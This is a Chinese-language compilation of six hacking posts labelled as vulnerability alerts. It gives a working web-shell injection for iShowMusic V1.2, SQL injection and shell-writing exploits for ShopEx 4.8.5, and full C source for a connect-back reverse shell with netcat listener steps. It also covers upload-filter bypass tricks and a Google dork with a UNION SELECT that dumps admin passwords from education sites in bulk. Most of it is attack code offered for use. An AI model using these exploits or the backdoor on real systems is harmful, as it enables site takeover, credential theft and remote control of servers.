以下是小编为大家准备的iShowMusic V1.2 写入shell漏洞漏洞预警,本文共6篇,仅供参考,大家一起来看看吧。

篇1:iShowMusic V1.2 写入shell漏洞漏洞预警
前几天公布的漏洞了,这几天比较忙,今天才看到,刚好前段时间用这套程序做了个音乐站,在自己的站里测试成功了,顺便也补了下漏洞。
--------
漏洞描述:
iShow Music 是一套基本于PHP+TXT的在线音乐播放程序。程序采用文本数据存储方式,无需MYSQL数据库支持,同时程序代码与界面模板分离,方便你的音乐网站界面修改。在error.php 12-26行PHP代码
elseif ($_POST['action']==“save”){$cknumon && GdConfirm($gdcode);if(emptyempty($id)) {Showmsg(“no”,“你还未选择歌曲呢!”,“返回重新填写”,“javascript.:history.back(-1)”); exit;}elseif(emptyempty($_POST['user'])) {Showmsg(“no”,“你还没写名字呢!”,“返回重新填写”,“javascript.:history.back(-1)”); exit;}else{$user=safeconvert($user);$line=“$user|$songname|$id|$errmsg|$timestamp|\n”;$e=“$datadir/error.php”;writetofile($e,$line,“a+”);Showmsg(“yes”,“提交成功,谢谢您的支持!”,“关闭本页”,“javascript.:window.close”); exit;}在global.php 27-34行PHP代码
foreach($_POST as $_key=>$_value){$_POST[$_key]=str_replace(array('|','$','..'),array('|','$','..'),$_POST[$_key]);!ereg(“^\_”,$_key) && !$$_key && $$_key=$_POST[$_key];}foreach($_GET as $_key=>$_value){$_GET[$_key]=str_replace(array('|','$','..'),array('|','$','..'),$_GET[$_key]);!ereg(“^\_”,$_key) && !$$_key && $$_key=$_GET[$_key];}这段代码是允许在register_globals在off的情况下工作程序作者的意图应该是把post和get提交的值过滤一下吧,这里手误把$_POST[$_key]给过滤了.导致失去了这段代码本来的作用.PHP代码
function writetofile($file_name, $data, $method = “w”){$filenum = fopen($file_name, $method);flock($filenum, LOCK_EX);$file_data = fwrite($filenum, $data);fclose($filenum);return $file_data;}这个函数也没有任何过滤就把$data写进去了
<*参考By qiur3n
www.wolvez.org/*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
www.xxx.com/error.php?errid=1&errtitle=<?eval($_POST[wst]);?>然后提交一下你就能获得一个shell在www.xxx.com/data/error.php ($datadir默认为/data/,建议用这程序的管理员把这个默认值和文件夹改名,呵呵)
篇2:iShowMusic V1.2 写入shell漏洞
前几天公布的漏洞了,这几天比较忙,今天才看到,
iShowMusic V1.2 写入shell漏洞
,
刚好前段时间用这套程序做了个音乐站,在自己的站里测试成功了,顺便也补了下漏洞。
篇3:shopex 4.8.5.45144注入和远程shell写入漏洞漏洞预警
ShopEx网上商店平台软件系统又称网店管理系统、网店程序、网上购物系统、在线购物系统,
一:shopex 4.8.5.45144 \core\include_v5\shopCore.php 注入漏洞
\core\include_v5\shopCore.php
01 public function shopCore( )
02 {
03 parent::kernel( );
04 if ( isset( $_POST['spgdif'] ) )
05 {
06 $this->spgdif( ); //进入函数
07 exit( );
08 }
09 ............................
10 }
11 public function spgdif( )
12 {
13 include_once( CORE_DIR.“/func_ext.php” );
14 if ( $_POST['session'] && $_POST['query'] && $_POST['sign'] ) //没任何过滤
15 {
16 if ( md5( $_POST['query'].$_POST['session'].“shopex_stats” ) == $_POST['sign'] ) //MD5 验证,我们可以自己控制。
17 {
18 $cert = $this->loadModel( “service/certificate” );
19 if ( $data = $cert->session_vaild( $_POST['session'] ) )
20 {
21 $this->fetchdata( $_POST['query'] );
22 }
23 ..........................
24 public function fetchdata( $params )
25 {
26 $params = unserialize( $params );
27 $sql = “SELECT ”;
28 foreach ( $params['fields'] as $key =>$value )
29 {
30 $sql .= $value['method'].“(”.$value['name'].“)”;
31 if ( $value['alias'] )
32 {33 $sql .= “ as ”.$value['alias']; //代入sql
34 }
35 $sql .= “,”;
36 }
37 $sql = substr( $sql, 0, -1 );
38 $sql .= “ FROM ”.$params['tbl'].“ ”;
39 ...............
40 $db = $this->database( );
41 ob_start( );
42 $data = $db->select( $sql );
43 ob_end_clean( );
44 if ( $data )
45 {
46 echo json_encode( array(
47 “res” =>“succ”,
48 “data” =>$data //没任何干扰,全部显示出来!(人品好了点,
)
49 ) );
50 }
51 else
52 {
53 echo json_encode( array(
54 “res” =>“fail”,
55 “data” =>$sql
56 ) );
57 }
58 }
利用代码exp:
exploit.htm
-----
SQL Injection
Vulnerability
O(°…_°…)O…‰¡À' style=“width:150px;height:100px” />
shopex 4.8.5 SQL Injection Vulnerability 0day ”.06.12
By:qing
QQ:33089632
二:shopex 4.8.5.45144 \core\include_v5\crontab.php 远程shell写入漏洞
\core\include_v5\crontab.php (zend加密后的,我只发布解密后的代码)
01 public function run( )
02 {
03 $this->logFile = HOME_DIR.“/logs/access.log.php”;
04 $this->now = time( );
05 $this->viewStat( );
06 $messenger =& $this->loadModel( “system/messenger” );
07 $messenger->runQueue( );
08 }
09
10 public function viewStat( )
11 {
12 if ( !file_exists( $this->logFile ) )
13 {
14 file_put_contents( $this->logFile, “#
15 }
16 if ( isset( $_GET['action'] ) )
17 {
18 error_log( $this->now.”\t“.$_GET['action'].”\t“.$_GET['p'].”\n“, 3, $this->logFile );//没有任何过滤,
利用:
直接提交:127.0.0.1/shopex/?cron=1&action=1&p=1
一句话在:127.0.0.1/shopex/home/logs/access.log.php
篇4:linux 反弹shell漏洞预警
#include
#include
#include
#include
#include
#include
#include
void usage;
char shell[]=”/bin/sh“;
char message[]=”s8s8 welcome\n“;
int sock;
int main(int argc, char *argv[]) {
if(argc <3){
usage(argv[0]);
}
struct sockaddr_in server;
if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf(”Couldn't make socket!\n“); exit(-1);
}
server.sin_family = AF_INET;
server.sin_port = htons(atoi(argv[2]));
server.sin_addr.s_addr = inet_addr(argv[1]);
if(connect(sock, (struct sockaddr *)&server, sizeof(struct sockaddr)) == -1) {
printf(”Could not connect to remote shell!\n“);
exit(-1);
}
send(sock, message, sizeof(message), 0);
dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);
execl(shell,”/bin/sh“,(char *)0);
close(sock);
return 1;
}
void usage(char *prog[]) {
printf(”\t\ts8s8 connect back door\n\n“);
printf(”\t sql@s8s8.net\n\n“);
printf(”Usage: %s \n", prog);
exit(-1);
}
gcc -o f f.c
再在本机上监听一个端口
nc -l -p 8888
再执行./f 192.168.1.14 8888
注:反弹回来的 shell没提示符,
linux 反弹shell漏洞预警
,
篇5:常用的后台上传拿shell漏洞预警
有的时候进入后台了,拿shell也可能是你羁绊,有编辑器的话,再具体说吧,万一编辑器是精简版的或者是漏洞修补的FCK,只能利用一些小的上传点了,可不要小看这些上传点。
能不能利用的NC提交,其实NC提交已经反锁了,利用opera浏览器或者使用suitbute更为简洁。那一般说来什么情况下可以如此使用呢,看源代码
出现类似filepath value=”upload”就爽歪歪了,试着修改value=“upload.asp;”
出现类似filename value =”1312321321″ ,试着修改value=”1312321321.asp”
如果还不行的可是在后面加上一个空格或者;试试
篇6:教育站漏洞批量拿shell漏洞预警
教育站打印页面漏洞
google搜索 inurl:info_Print.asp?ArticleID=
默认后台:website/ad_login.asp
爆管理员密码:
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
经过测试,大部分都可以爆出来,解下MD5就一路顺风~
★淘客帝国系统后台cookie欺骗漏洞及后台拿shell漏洞预警
★Discuz!7.07.2后台settings.inc.php中写shell漏洞
★Android Linux Kernel 2.6本地DoS漏洞预警
文档为doc格式